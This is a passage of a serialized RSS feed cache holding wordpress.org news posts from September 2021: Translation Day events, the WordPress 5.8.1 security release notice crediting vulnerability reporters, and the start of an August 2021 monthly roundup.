AbhaNonStopNewsUK\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:8444:\"\n<p>WordPress contributors around the world are <a href=\"https://wptranslationday.org/\">celebrating the sixth Global WordPress Translation Day</a> throughout the entire month of September! That&#8217;s 30 days dedicated to help and encourage the volunteers that translate the software and its related resources. One of the highlights will be a <a href=\"https://wptranslationday.org/wptd-2021/global-events/\">series of exciting global events</a>, starting on September 17 2021 and finishing on the United Nations&#8217; International Translation Day itself on September 30, 2021.</p>\n\n\n\n<p>Everyone is welcome to watch these events live on <a href=\"https://www.youtube.com/c/WordPressMarketingTeam\">YouTube</a> and to share their translation stories which will be featured during the celebrations and beyond. The global events will be in English and include presentations on how and why to you should join the thousands of translators in the project, tips and tools, interviews, and much more. </p>\n\n\n\n<p>There are now 205 locales translating in what is a remarkable open source effort, bringing the opportunities of the software and its community to people in their own native languages.   </p>\n\n\n\n<h2>Inaugural session: Introduction and latest news on WordPress Translation</h2>\n\n\n\n<h3><strong>Friday, September 17, 2021 at </strong><a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210917T1000\"><strong>10:00 UTC</strong></a></h3>\n\n\n\n<p>We will start the <a href=\"https://wptranslationday.org/wptd-2021/global-events/\">global events</a> with a panel featuring the latest update on what is happening in the world of WordPress polyglots. Panellists will include translators and polyglot supporters <a href=\"https://profiles.wordpress.org/petya/\">Petya Raykovska</a> and <a href=\"https://profiles.wordpress.org/evarlese/\">Erica Varlese</a>. There will be a video demonstration on how to translate WordPress, a short presentation on translation statistics, a run down of upcoming events, and more. <br><br>Watch the <a rel=\"noreferrer noopener\" href=\"https://www.youtube.com/watch?v=3HSBB5F_ag0\" target=\"_blank\">event live on YouTube</a> (or click on the play button below) &#8211; sign-up for notifications in the video stream right now so you don&#8217;t miss it when it goes live! </p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" class=\"youtube-player\" width=\"632\" height=\"356\" src=\"https://www.youtube.com/embed/3HSBB5F_ag0?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=en-US&#038;autohide=2&#038;wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation\"></iframe>\n</div></figure>\n\n\n\n<h3><strong>Friday, September 17, 2021 at 11:00 UTC</strong> </h3>\n\n\n\n<p>Right after the livestream, there will be a &#8216;drop-in&#8217; translation sprint on Zoom video-conferencing, open to all. You can join and hang out virtually with your Polyglots friends from all around the world and translate WordPress in your own language! <a href=\"https://www.meetup.com/Portsmouth-WordPress-Meetup/events/280823032/\">RSVP for the session now and get joining links!</a> </p>\n\n\n\n<figure class=\"wp-block-image\"><img src=\"https://lh4.googleusercontent.com/r2rVEDkb39h02LiBg2GdayDk1LpZi6kxZnv1MRzT9h6pgSQE9FMBmyx_kJUA-Pjyy1KD__YlzLYvd1P53o1UIxTEfb0fmQnHm40UU23Wb1slXm-ajdGNP5qOyzHyTI07NBCM-mwY=s0\" alt=\"\" /></figure>\n\n\n\n<h2>Check out the other exciting global events</h2>\n\n\n\n<h3><strong>Sunday, September 19, 2021 <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210919T1200\">12:00 UTC</a></strong></h3>\n\n\n\n<p><a rel=\"noreferrer noopener\" href=\"https://www.youtube.com/watch?v=M7UtEKIp2FY\" target=\"_blank\"><strong>Panel on Polyglots Tools</strong></a><a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210919T1200\"> <br></a>Join <a href=\"https://profiles.wordpress.org/amieiro/\">Jesús Amieiro</a>, <a href=\"https://profiles.wordpress.org/psmits1567/\">Peter Smits</a>, <a href=\"https://profiles.wordpress.org/vladytimy/\">Vlad Timotei</a>, and <a href=\"https://profiles.wordpress.org/vibgyj/\">Vibgy Joseph</a> to talk about the tools they’ve contributed to or developed to help translators and translation editors.</p>\n\n\n\n<h3><strong>Tuesday, September 21, 2021 <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210921T1100\">11:00 UTC</a></strong></h3>\n\n\n\n<p><a href=\"https://www.youtube.com/watch?v=0Ps8byYIwLs\"><strong>Panel on Open Source Translation Communities</strong></a> (YouTube link &#8211; opens in a new tab)<a rel=\"noreferrer noopener\" href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210921T1100\" target=\"_blank\"><br></a>Join <a href=\"https://profiles.wordpress.org/vanillalounge/\">Zé Fontainhas</a> (WordPress), <a href=\"https://profiles.wordpress.org/tokyobiyori/\">Ali Darwich</a> (WordPress), <a href=\"https://www.linkedin.com/in/mstanke?originalSubdomain=cz\">Michal Stanke</a> (Mozilla), and <a href=\"https://www.linkedin.com/in/satomi-tsujita/?originalSubdomain=jp\">Satomi Tsujita</a> (Hyperledger Fabric) to learn about nurturing translation communities.</p>\n\n\n\n<h3><strong>Thursday, September 30, 2021 <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210930T1600\">16:00 UTC</a></strong></h3>\n\n\n\n<p><a href=\"https://www.youtube.com/watch?v=qyQUaiK19js\"><strong>Closing Party – Why do you translate?</strong></a> <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?iso=20210930T1600\"><br></a>Our finale event for 2021 with emcee <a href=\"https://profiles.wordpress.org/webcommsat/\">Abha Thakor</a> and a panel from the WordPress Translation Day Team. It will feature highlights from some of the local and global events during the month and a selection of results. Some of the nominees for this year&#8217;s polyglots appreciation will join the livestream to share their stories.</p>\n\n\n\n<p>The livestream will be followed by an after party celebration for anyone who has taken part in the event or is a WordPress polyglot. <a href=\"https://www.meetup.com/Portsmouth-WordPress-Meetup/events/280823393/\">Book now</a> for the session on Zoom.</p>\n\n\n\n<h2>Ideas on how to get involved this September</h2>\n\n\n\n<p>There&#8217;s lots of ways to take part &#8211; discover this <a href=\"https://wptranslationday.org/blog/ways-to-participate/\">list of ideas</a>.</p>\n\n\n\n<p>You can also nominate <a href=\"https://wptranslationday.org/blog/call-for-nominations-polyglots-appreciation/\">translation contributors</a> to be featured in this year&#8217;s celebrations.</p>\n\n\n\n<h2>Help us spread the word about #WPTranslationDay</h2>\n\n\n\n<ul><li>Share what you are translating using the #WPTranslationDay hashtag on: <a href=\"https://www.facebook.com/WPTranslationDay/\">Facebook</a>,<a href=\"https://twitter.com/TranslateWP\"> Twitter</a>, <a href=\"https://www.instagram.com/wptranslationday/\">Instagram</a>, and <a href=\"https://www.linkedin.com/company/wptranslationday/\">LinkedIn</a>! </li><li>You can also find images and translator badges in our <a href=\"https://wptranslationday.org/wptd-2021/media-kit/\">Media Kit</a> to share during September.</li></ul>\n\n\n\n<p>For more information on the 2021 WordPress Translation Day celebrations, visit <a href=\"https://wptranslationday.org/\">the WordPress Translation Day website</a>.</p>\n\n\n\n<p></p>\n\n\n\n<p><em>Props to <a href=\'https://profiles.wordpress.org/webcommsat/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>webcommsat</a>, <a href=\'https://profiles.wordpress.org/harishanker/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>harishanker</a>, <a href=\'https://profiles.wordpress.org/lmurillom/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>lmurillom</a>, <a href=\'https://profiles.wordpress.org/oglekler/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>oglekler</a>, <a href=\'https://profiles.wordpress.org/meher/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>meher</a>, <a href=\'https://profiles.wordpress.org/nalininonstopnewsuk/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>nalininonstopnewsuk</a>, <a href=\'https://profiles.wordpress.org/evarlese/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>evarlese</a></em> for contributing to this story.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"11215\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:60:\"\n		\n		\n		\n		\n		\n				\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"WordPress 5.8.1 Security and Maintenance Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 09 Sep 2021 03:11:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=11190\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:363:\"WordPress 5.8.1 is now available! This security and maintenance release features 60 bug fixes in addition to 3 security fixes. Because this is a security release, it is recommended that you update your sites immediately. All versions since WordPress 5.4 have also been updated. WordPress 5.8.1 is a short-cycle security and maintenance release. The next [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Jonathan Desrosiers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:8900:\"\n<p>WordPress 5.8.1 is now available!</p>\n\n\n\n<p>This security and maintenance release features <a href=\"https://core.trac.wordpress.org/query?milestone=5.8.1&amp;group=component&amp;col=id&amp;col=summary&amp;col=milestone&amp;col=owner&amp;col=type&amp;col=status&amp;col=priority&amp;order=priority\">60 bug</a> <a href=\"https://github.com/WordPress/gutenberg/pull/34393\">fixes</a> in addition to 3 security fixes. Because this is a <strong>security release</strong>, it is recommended that you update your sites immediately. All versions since WordPress 5.4 have also been updated.</p>\n\n\n\n<p>WordPress 5.8.1 is a short-cycle security and maintenance release. The next major release will be version <a href=\"https://make.wordpress.org/core/5-9/\">5.9</a>.</p>\n\n\n\n<p>You can download WordPress 5.8.1 by downloading from WordPress.org, or visit your Dashboard → Updates and click Update Now.</p>\n\n\n\n<p>If you have sites that support automatic background updates, they’ve already started the update process.</p>\n\n\n\n<h3><strong>Security Updates</strong></h3>\n\n\n\n<p>3 security issues affect WordPress versions between 5.4 and 5.8. If you haven’t yet updated to 5.8, all WordPress versions since 5.4 have also been updated to fix the following security issues:</p>\n\n\n\n<ul><li>Props <a href=\'https://profiles.wordpress.org/mdawaffe/\' class=\'mention\'><span class=\'mentions-prefix\'>@</span>mdawaffe</a>, member of the WordPress Security Team for their work fixing a data exposure vulnerability within the REST API.</li><li>Props to Michał Bentkowski of Securitum for reporting a XSS vulnerability in the block editor.</li><li>The Lodash library has been updated to version 4.17.21 in each branch to incorporate upstream security fixes.</li></ul>\n\n\n\n<p>In addition to these issues, the security team would like to thank the following people for reporting vulnerabilities during the WordPress 5.8 beta testing period, allowing them to be fixed prior to release:</p>\n\n\n\n<ul><li>Props <a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://evanricafort.com/\">Evan Ricafort</a>&nbsp;for reporting a XSS vulnerability in the block editor discovered during the 5.8 release’s beta period.</li><li>Props <a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://profiles.wordpress.org/stevehenty/\">Steve Henty</a>&nbsp;for reporting a privilege escalation issue in the block editor.</li></ul>\n\n\n\n<p>Thank you to all of the reporters for <a href=\"https://make.wordpress.org/core/handbook/testing/reporting-security-vulnerabilities/\">privately disclosing the vulnerabilities</a>. This gave the WordPress security team time to fix the vulnerabilities before WordPress sites could be attacked.</p>\n\n\n\n<p>For more information, browse the <a href=\"https://core.trac.wordpress.org/query?milestone=5.8.1&amp;group=component&amp;col=id&amp;col=summary&amp;col=milestone&amp;col=owner&amp;col=type&amp;col=status&amp;col=priority&amp;order=priority\">full list of changes</a> on Trac, or check out the <a href=\"https://wordpress.org/support/wordpress-version/version-5-8-1/\">version 5.8.1 HelpHub documentation page</a>.</p>\n\n\n\n<h2>Thanks and props!</h2>\n\n\n\n<p>The 5.8.1 release was led by <a href=\"https://profiles.wordpress.org/desrosj/\">Jonathan Desrosiers</a> and <a href=\"https://profiles.wordpress.org/circlecube/\">Evan Mullins</a>.</p>\n\n\n\n<p>In addition to the security researchers and release squad members mentioned above, thank you to everyone who helped make WordPress 5.8.1 happen:</p>\n\n\n\n<a href=\"https://profiles.wordpress.org/2linctools/\">2linctools</a>, <a href=\"https://profiles.wordpress.org/zieladam/\">Adam Zielinski</a>, <a href=\"https://profiles.wordpress.org/schlessera/\">Alain Schlesser</a>, <a href=\"https://profiles.wordpress.org/ajlende/\">Alex Lende</a>, <a href=\"https://profiles.wordpress.org/alexstine/\">alexstine</a>, <a href=\"https://profiles.wordpress.org/algala/\">AlGala</a>, <a href=\"https://profiles.wordpress.org/oandregal/\">André</a>, <a href=\"https://profiles.wordpress.org/andraganescu/\">Andrei Draganescu</a>, <a href=\"https://profiles.wordpress.org/azaozz/\">Andrew Ozz</a>, <a href=\"https://profiles.wordpress.org/ankitmaru/\">Ankit Panchal</a>, <a href=\"https://profiles.wordpress.org/antpb/\">Anthony Burchell</a>, <a href=\"https://profiles.wordpress.org/antonvlasenko/\">Anton Vlasenko</a>, <a href=\"https://profiles.wordpress.org/aristath/\">Ari Stathopoulos</a>, <a href=\"https://profiles.wordpress.org/ribaricplusplus/\">Bruno Ribaric</a>, <a href=\"https://profiles.wordpress.org/poena/\">Carolina Nymark</a>, <a href=\"https://profiles.wordpress.org/daisyo/\">Daisy Olsen</a>, <a href=\"https://profiles.wordpress.org/talldanwp/\">Daniel Richards</a>, <a href=\"https://profiles.wordpress.org/dariak/\">Daria</a>, <a href=\"https://profiles.wordpress.org/davidanderson/\">David Anderson</a>, <a href=\"https://profiles.wordpress.org/davidbinda/\">David Biňovec</a>, <a href=\"https://profiles.wordpress.org/dlh/\">David Herrera</a>, <a href=\"https://profiles.wordpress.org/ocean90/\">Dominik Schilling</a>, <a href=\"https://profiles.wordpress.org/ellatrix/\">Ella van&nbsp;Durpe</a>, <a href=\"https://profiles.wordpress.org/enchiridion/\">Enchiridion</a>, <a href=\"https://profiles.wordpress.org/circlecube/\">Evan Mullins</a>, <a href=\"https://profiles.wordpress.org/garyj/\">Gary Jones</a>, <a href=\"https://profiles.wordpress.org/mamaduka/\">George Mamadashvili</a>, <a href=\"https://profiles.wordpress.org/gziolo/\">Greg Ziółkowski</a>, <a href=\"https://profiles.wordpress.org/priethor/\">Héctor Prieto</a>, <a href=\"https://profiles.wordpress.org/ianmjones/\">ianmjones</a>, <a href=\"https://profiles.wordpress.org/audrasjb/\">Jb Audras</a>, <a href=\"https://profiles.wordpress.org/jblz/\">Jeff Bowen</a>, <a href=\"https://profiles.wordpress.org/joedolson/\">Joe Dolson</a>, <a href=\"https://profiles.wordpress.org/joen/\">Joen A.</a>, <a href=\"https://profiles.wordpress.org/johnbillion/\">John Blackbourn</a>, <a href=\"https://profiles.wordpress.org/desrosj/\">Jonathan Desrosiers</a>, <a href=\"https://profiles.wordpress.org/juanmaguitar/\">JuanMa Garrido</a>, <a href=\"https://profiles.wordpress.org/jrf/\">Juliette Reinders Folmer</a>, <a href=\"https://profiles.wordpress.org/kevin940726/\">Kai Hao</a>, <a href=\"https://profiles.wordpress.org/kapilpaul/\">Kapil Paul</a>, <a href=\"https://profiles.wordpress.org/gwwar/\">Kerry Liu</a>, <a href=\"https://profiles.wordpress.org/kevinfodness/\">Kevin Fodness</a>, <a href=\"https://profiles.wordpress.org/mkaz/\">Marcus Kazmierczak</a>, <a href=\"https://profiles.wordpress.org/mark-k/\">Mark-k</a>, <a href=\"https://profiles.wordpress.org/mhuntdesign/\">Matt</a>, <a href=\"https://profiles.wordpress.org/mdawaffe/\">Michael Adams (mdawaffe)</a>, <a href=\"https://profiles.wordpress.org/mikeschroder/\">Mike Schroder</a>, <a href=\"https://profiles.wordpress.org/moch11/\">moch11</a>, <a href=\"https://profiles.wordpress.org/mukesh27/\">Mukesh Panchal</a>, <a href=\"https://profiles.wordpress.org/ntsekouras/\">Nik Tsekouras</a>, <a href=\"https://profiles.wordpress.org/paaljoachim/\">Paal Joachim Romdahl</a>, <a href=\"https://profiles.wordpress.org/swissspidy/\">Pascal Birchler</a>, <a href=\"https://profiles.wordpress.org/pbearne/\">Paul Bearne</a>, <a href=\"https://profiles.wordpress.org/pbiron/\">Paul Biron</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/walbo/\">Petter Walbø Johnsgård</a>, <a href=\"https://profiles.wordpress.org/radixweb/\">Radixweb</a>, <a href=\"https://profiles.wordpress.org/rtm909/\">Rahul Mehta</a>, <a href=\"https://profiles.wordpress.org/ramonopoly/\">ramonopoly</a>, <a href=\"https://profiles.wordpress.org/ravipatel/\">ravipatel</a>, <a href=\"https://profiles.wordpress.org/youknowriad/\">Riad Benguella</a>, <a href=\"https://profiles.wordpress.org/noisysocks/\">Robert Anderson</a>, <a href=\"https://profiles.wordpress.org/kreppar/\">Rodrigo Arias</a>, <a href=\"https://profiles.wordpress.org/sanketchodavadiya/\">Sanket Chodavadiya</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/sabernhardt/\">Stephen Bernhardt</a>, <a href=\"https://profiles.wordpress.org/netweb/\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/stevehenty/\">Steve Henty</a>, <a href=\"https://profiles.wordpress.org/terraling/\">terraling</a>, <a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a>, <a href=\"https://profiles.wordpress.org/tmatsuur/\">tmatsuur</a>, <a href=\"https://profiles.wordpress.org/tobiasbg/\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/hellofromTonya/\">Tonya Mork</a>, <a href=\"https://profiles.wordpress.org/toro_unit/\">Toro_Unit (Hiroshi Urabe)</a>, <a href=\"https://profiles.wordpress.org/vladytimy/\">Vlad T</a>, <a href=\"https://profiles.wordpress.org/wb1234/\">wb1234</a>, and <a href=\"https://profiles.wordpress.org/wfmattr/\">WFMattR</a>.\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"11190\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"The Month in WordPress: August 2021\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"https://wordpress.org/news/2021/09/the-month-in-wordpress-august-2021/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 03 Sep 2021 14:00:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:18:\"Month in WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:18:\"month in wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:7:\"updates\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"https://wordpress.org/news/?p=11176\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:338:\"I really believe in WordPress’ mission to democratize publishing. And I, for one, will never stop learning about what gives people more access to the software, and what makes the software more usable, and especially how we can combine usability with accessibility in a way that puts form and function on a level playing field. [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Hari Shanker R\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:16142:\"\n<blockquote class=\"wp-block-quote\"><p>I really believe in WordPress’ mission to democratize publishing. And I, for one, will never stop learning about what gives people more access to the software, and what makes the software more usable, and especially how we can combine usability with accessibility in a way that puts form and function on a level playing field.<br></p></blockquote>\n\n\n\n<p>That was <a href=\"https://profiles.wordpress.org/chanthaboune/\">Josepha Haden</a> on the “<a href=\"https://wordpress.org/news/2021/08/episode-14-the-art-and-science-of-accessibility/\">The Art and Science of Accessibility</a>” episode of the <a href=\"https://wordpress.org/news/podcast/\">WP Briefing Podcast</a>, talking about accessibility and exploring how it applies to the WordPress open source software. You will find that many of our updates from August 2021 tie in closely with the core principles of access, accessibility, and usability. Read on to find out more!</p>\n\n\n\n<hr class=\"wp-block-separator\" />\n\n\n\n<h2>Join the 2021 WordPress Translation Day Celebrations in September</h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https://wptranslationday.org/\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" width=\"632\" height=\"395\" src=\"https://i0.wp.com/wordpress.org/news/files/2021/09/image.jpeg?resize=632%2C395&#038;ssl=1\" alt=\"WordPress Translation Day 2021 September 1 - 30, 2021\" class=\"wp-image-11177\" srcset=\"https://i0.wp.com/wordpress.org/news/files/2021/09/image.jpeg?resize=1024%2C640&amp;ssl=1 1024w, https://i0.wp.com/wordpress.org/news/files/2021/09/image.jpeg?resize=300%2C188&amp;ssl=1 300w, https://i0.wp.com/wordpress.org/news/files/2021/09/image.jpeg?resize=768%2C480&amp;ssl=1 768w, https://i0.wp.com/wordpress.org/news/files/2021/09/image.jpeg?w=1440&amp;ssl=1 1440w, https://i0.wp.com/wordpress.org/news/files/2021/09/image.jpeg?w=1264&amp;ssl=1 1264w\" sizes=\"(max-width: 632px) 100vw, 632px\" data-recalc-dims=\"1\" /></a></figure>\n\n\n\n<p>Join WordPress contributors around the world on <a href=\"https://wptranslationday.org/\">WordPress Translation Day celebrations</a> for the entire month of September! The sixth edition of #WPTranslationDay &#8211; which is a cross-team effort led by the Polyglots and Marketing Teams, has a host of fun programs aimed at helping WordPress speak all languages of the world. Want to join the fun? Here’s how.</p>\n\n\n\n<ul><li><a href=\"https://wptranslationday.org/wptd-2021/local-events/\">Join your local translation event</a> and collaborate on efforts to translate WordPress! Can’t find a <a href=\"https://wptranslationday.org/wptd-2021/local-events/\">local event in your area</a>? Why don’t you <a href=\"https://make.wordpress.org/polyglots/2021/08/11/call-for-local-event-organizers-wordpress-translation-day-2021/\">organize one on your own</a>?</li><li>Join <a href=\"https://wptranslationday.org/wptd-2021/global-events/\">one of our global events</a> from September 17-30!<em> </em>We have exciting sessions on <a href=\"https://wptranslationday.org/wptd-2021/global-events/\">polyglots tools and open source translation communities</a>, to name a few.</li><li>You can help<a href=\"https://translate.wordpress.org/\"> translate WordPress to your own language</a>, in your own time, this month! <a href=\"https://make.wordpress.org/polyglots/handbook/translating/first-steps/\">Here’s how!</a></li><li>Share what you are translating using the #WPTranslationDay hashtag on social media, to build excitement around the event! Don’t forget to amplify posts about the event on <a href=\"https://www.facebook.com/WPTranslationDay/\">Facebook</a>, <a href=\"https://twitter.com/TranslateWP\">Twitter</a>, <a href=\"https://www.instagram.com/wptranslationday/\">Instagram</a>, and <a href=\"https://www.linkedin.com/company/wptranslationday/\">LinkedIn</a>!</li></ul>\n\n\n\n<p>&nbsp;For more information, check out <a href=\"https://wptranslationday.org/\">the translation day website</a> and the <a href=\"https://make.wordpress.org/polylgots/tag/wptranslationday/\">Polyglots blog</a>.</p>\n\n\n\n<h2>WordPress Release Updates</h2>\n\n\n\n<p>The Core Team <a href=\"https://make.wordpress.org/core/2021/08/13/preliminary-road-to-5-9/\">commenced work</a> on the next major release &#8211; WordPress 5.9. The team aims to ship some cool features such as intrinsic web design to blocks, improved block patterns, navigation menus, better design tools, edit flows for block themes, and a new interface for theme.json. Check out the <a href=\"https://make.wordpress.org/core/5-9/\">WordPress 5.9 development cycle</a> to know more. This release is set to go out in December 2021. The team is also <a href=\"https://make.wordpress.org/core/2021/08/24/wordpress-5-8-x-release-team-and-5-8-1-schedule/\">working on shipping a minor release WordPress 5.8.1</a> –– its <a href=\"https://make.wordpress.org/core/2021/09/01/wordpress-5-8-1-rc-1/\">release candidate</a> is already out and the final release will launch on September 8.</p>\n\n\n\n<p>Want to contribute to WordPress core? Join the <a href=\"https://wordpress.slack.com/archives/C02RQBWTW\">#core</a> channel, follow the <a href=\"https://make.wordpress.org/core/\">Core Team blog</a>, and check out the <a href=\"https://make.wordpress.org/core/handbook/\">team handbook</a>. Don’t miss the Core Team chats on Wednesdays at <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?hour=5&amp;min=00&amp;sec=0\">5 AM</a> and <a href=\"https://www.timeanddate.com/worldclock/fixedtime.html?hour=20&amp;min=00&amp;sec=0\">8 PM</a> UTC. You can also help <a href=\"https://translate.wordpress.org/\">translate WordPress</a> to your local language &#8211; and what better time to do it, than in September, <a href=\"https://wptranslationday.org/\">during the translation month celebrations</a>? Another fun way to contribute would be to <a href=\"https://make.wordpress.org/marketing/2021/08/11/share-about-wordpress-5-8-on-social-media/\">share about WordPress 5.8 on social media</a>!</p>\n\n\n\n<h2>Say Hello to Gutenberg Versions 11.2 and 11.3</h2>\n\n\n\n<p>We launched Gutenberg <a href=\"https://make.wordpress.org/core/2021/08/05/whats-new-in-gutenberg-11-2-0-4-august/\">version 11.2</a> and <a href=\"https://make.wordpress.org/core/2021/08/18/whats-new-in-gutenberg-11-3-18-august/\">version 11.3</a> this month. <a href=\"https://make.wordpress.org/core/2021/08/05/whats-new-in-gutenberg-11-2-0-4-august/\">Version 